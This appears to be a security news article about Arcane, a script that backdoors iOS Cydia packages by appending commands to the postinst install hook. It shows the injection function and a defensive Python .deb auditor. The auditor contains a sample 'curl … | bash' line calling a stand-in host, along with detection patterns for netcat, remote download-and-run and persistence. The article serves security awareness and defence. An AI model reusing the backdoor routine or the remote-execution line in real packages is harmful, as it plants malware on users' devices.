Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane works…
To understand what is happening in the GIF, decompress a package created with Arcane and look at its layout.
Notice the control and postinst files in the DEBIAN directory; both are important to how the package behaves on install.
tree /tmp/whois-decomp/
/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
# ($tmp, $infile, $payload and the status helper are set earlier in
# the Arcane script; only the relevant fragment is shown here.)
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    # Maintainer scripts must be executable or dpkg will not run them.
    chmod 0755 "$postinst"
};
The control file contains the metadata fields (package name, version, architecture, dependencies) that package management tools read when installing a package. Arcane either modifies the package's existing control file or creates one if it is missing.
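Because both the maintainer scripts and the control file live in the control tarball of the .deb, a defender can inspect them before a package is ever installed. The following added example (written for this article, not part of Arcane or dpkg) parses the outer ar container of a .deb, reads the control fields, and reports every preinst/postinst/prerm/postrm script together with its mode and any shell patterns that do not belong in a legitimate install hook. The package it audits is constructed in memory with the same DEBIAN/control, DEBIAN/postinst and usr/bin/whois layout shown above; the field values, the sample postinst contents and the list of suspicious patterns are assumptions made for the demonstration.

```python
import io
import re
import tarfile
import time

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Shell constructs a reviewer would not expect in a legitimate install hook
# (assumed heuristics for the example, not an exhaustive rule set).
SUSPICIOUS = [
    (r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b", "downloads and executes remote content"),
    (r"/Library/LaunchDaemons/", "writes a persistent launch daemon"),
    (r"\b(nc|ncat|netcat)\b", "invokes a raw network client"),
    (r"base64\s+(-d|--decode)|\beval\b", "decodes or evals obfuscated input"),
]


def parse_ar(blob: bytes) -> dict:
    """Parse the outer 'ar' container of a .deb into {member_name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                     # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header at offset %d" % pos)
        name = hdr[0:16].decode().rstrip(" /")       # some ar writers append '/'
        size = int(hdr[48:58].decode().strip())
        start = pos + 60
        members[name] = blob[start:start + size]
        pos = start + size + (size % 2)              # members are padded to even offsets
    return members


def audit_deb(blob: bytes) -> dict:
    """Return the parsed control fields plus findings for each maintainer script."""
    members = parse_ar(blob)
    ctrl_name = next(n for n in members if n.startswith("control.tar"))
    report = {"control": {}, "scripts": {}}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl_name]), mode="r:*") as tar:
        for info in tar.getmembers():
            if not info.isfile():
                continue
            base = info.name.lstrip("./")            # dpkg stores entries as ./control etc.
            data = tar.extractfile(info).read()
            if base == "control":
                for line in data.decode(errors="replace").splitlines():
                    if ":" in line and not line.startswith(" "):   # skip folded lines
                        key, value = line.split(":", 1)
                        report["control"][key.strip()] = value.strip()
            elif base in MAINTAINER_SCRIPTS:
                text = data.decode(errors="replace")
                report["scripts"][base] = {
                    "mode": oct(info.mode & 0o777),
                    "executable": bool(info.mode & 0o111),   # dpkg only runs executable hooks
                    "findings": [why for pat, why in SUSPICIOUS if re.search(pat, text)],
                }
    return report


# --- constructed sample package so the audit can run offline ---------------
def _tar_bytes(entries: dict) -> bytes:
    """Build a gzip tarball from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (mode, data) in entries.items():
            info = tarfile.TarInfo(name=path)
            info.size, info.mode, info.mtime = len(data), mode, int(time.time())
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ar_archive(members: list) -> bytes:
    """Build a classic ar archive (the outer .deb container) from [(name, bytes)]."""
    out = bytearray(b"!<arch>\n")
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


# Assumed field values; the postinst carries one line of the kind Arcane appends.
CONTROL = b"Package: whois\nVersion: 5.3.2\nArchitecture: iphoneos-arm\nMaintainer: constructed\n"
POSTINST = b"#!/bin/bash\nset -e\ncurl -s http://example.invalid/p | bash\n"


def build_sample_deb() -> bytes:
    """Constructed .deb mirroring the DEBIAN/{control,postinst} + usr/bin/whois layout."""
    control_tar = _tar_bytes({"./control": (0o644, CONTROL), "./postinst": (0o755, POSTINST)})
    data_tar = _tar_bytes({"./usr/bin/whois": (0o755, b"#!/bin/sh\necho whois stub\n")})
    return _ar_archive([("debian-binary", b"2.0\n"), ("control.tar.gz", control_tar),
                        ("data.tar.gz", data_tar)])


if __name__ == "__main__":
    rep = audit_deb(build_sample_deb())
    print(rep["control"].get("Package"), rep["control"].get("Version"), rep["control"].get("Architecture"))
    for script, detail in rep["scripts"].items():
        verdict = "SUSPICIOUS" if detail["findings"] else "ok"
        print(f"{script}: mode={detail['mode']} {verdict} {detail['findings']}")
```

Run against a real package, the same `audit_deb` call takes the bytes of the .deb file; the value of the check is that it reads the hooks straight from the archive, so a backdoored postinst is visible before dpkg or Cydia ever executes it. The heuristics are deliberately simple and will miss obfuscated payloads; treat any non-empty maintainer script from an untrusted repository as worth reading by hand.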
Ddos is a seasoned news reporter, bringing over a decade of expertise to the forefront of cyber security and technology reporting, whose work provides timely and insightful analysis of emerging trends and critical developments in these rapidly evolving sectors.